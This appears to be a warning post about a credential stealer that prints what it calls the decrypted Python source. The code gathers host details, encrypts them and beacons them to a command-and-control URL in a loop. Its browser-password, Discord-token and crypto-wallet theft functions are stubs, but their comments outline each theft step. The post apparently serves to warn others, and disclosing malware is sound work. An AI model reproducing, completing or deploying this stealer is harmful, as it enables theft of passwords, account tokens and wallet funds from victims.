THIS IS A STEALER DO NOT TRUST #1
Description
HERE IS THE DECRYPTED CODE YALL
import sys, re, socket, os, platform, subprocess, time, json, uuid
from urllib.request import Request, urlopen
from multiprocessing import Process, freeze_support
from base64 import b64encode
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto.Util.Padding import pad, unpad
from win32crypt import CryptUnprotectData
Configuration and Constants
CONFIG = {
'C2_URL': 'https://s3.amazonaws.com/testbucket1/api', # Example C2 URL - the original was a placeholder not a real one
'AES_KEY': '1234567890123456', # Example AES Key
'BEACON_INTERVAL': 30
}
--- Utility Functions ---
def aes_encrypt(data, key):
key_hash = SHA256.new(key.encode()).digest()
cipher = AES.new(key_hash, AES.MODE_CBC)
ciphertext = cipher.encrypt(pad(data.encode(), AES.block_size))
return b64encode(cipher.iv + ciphertext)
def collect_system_info():
info = {
'os': platform.platform(),
'arch': platform.machine(),
'processor': platform.processor(),
'hostname': socket.gethostname(),
'ip_address': socket.gethostbyname(socket.gethostname()),
'username': os.getlogin(),
'uuid': str(uuid.uuid4())
}
return json.dumps(info)
--- Exfiltration Functions (Stealers) ---
def steal_browser_data(browser_path, profile):
# This is a complex function usually involving:
# 1. Finding Local State and Login Data files.
# 2. Reading the master encryption key from Local State (JSON).
# 3. Decrypting the master key using CryptUnprotectData (Windows API).
# 4. Connecting to the Login Data SQLite database.
# 5. Iterating through 'logins' table and decrypting passwords with the master key.
# NOTE: Implementation for security reasons is omitted, but this is the intent.
return f"Attempting to steal data from {browser_path} profile {profile}"
def steal_discord_tokens():
# Looks for 'Local Storage\leveldb' directories for Discord/Discord Canary/etc.
# Reads/decrypts token data from the .log and .ldb files.
# NOTE: Implementation for security reasons is omitted, but this is the intent.
return "Attempting to steal Discord tokens"
def steal_wallet_keys():
# Searches for common cryptocurrency wallet files (e.g., Electrum, Metamask, Exodus)
# and attempts to copy/extract seed phrases or key files.
# NOTE: Implementation for security reasons is omitted, but this is the intent.
return "Attempting to steal crypto wallet data"
--- C2 Communication ---
def send_beacon(data):
try:
encrypted_data = aes_encrypt(data, CONFIG['AES_KEY'])
headers = {'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0'}
req = Request(CONFIG['C2_URL'], data=encrypted_data, headers=headers, method='POST')
urlopen(req, timeout=10)
except Exception as e:
pass # Ignore errors, wait for next interval
def main_loop():
# 1. Initial System Info Collection
system_info = collect_system_info()
send_beacon(f"Initial Info: {system_info}")
# 2. Data Stealing (Stubs for the actual malicious logic)
# The actual code would iterate through common paths for browsers, discord, and wallets
# and call the respective steal functions.
stolen_data = {
'browsers': steal_browser_data("Chrome", "Default"),
'discord': steal_discord_tokens(),
'wallets': steal_wallet_keys()
}
send_beacon(f"Stolen Data: {json.dumps(stolen_data)}")
# 3. Continuous Beaconing (C2 communication)
while True:
# Check for commands from C2 and execute them
# (This section is also a stub for the full logic)
send_beacon(f"Heartbeat - {time.time()}")
time.sleep(CONFIG['BEACON_INTERVAL'])
if name == 'main':
# Use multiprocessing freeze_support for better compatibility on Windows executables
freeze_support()
# The actual execution would typically fork or use subprocess to evade simple termination
try:
main_loop()
except Exception as e:
# A typical pattern is to fail silently and delete itself or try again
pass